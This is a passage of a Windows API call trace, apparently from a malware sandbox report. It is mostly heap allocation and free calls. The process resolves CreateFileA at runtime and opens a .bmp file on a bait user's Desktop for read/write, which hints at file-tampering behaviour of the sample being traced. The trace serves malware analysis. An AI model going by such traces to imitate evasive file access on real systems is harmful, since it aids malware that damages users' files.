[0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba270 [0164.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba270, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.661] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0164.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0164.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.662] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0164.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0164.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0164.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa4f8 [0164.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpUsedDefaultChar=0x0) returned 65 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.663] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\kq7hl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0164.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x8feba8 [0164.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=65, lpWideCharStr=0x8feba8, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp") returned 65 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.667] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.669] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0164.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0164.670] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.670] RtlAllocateHeap 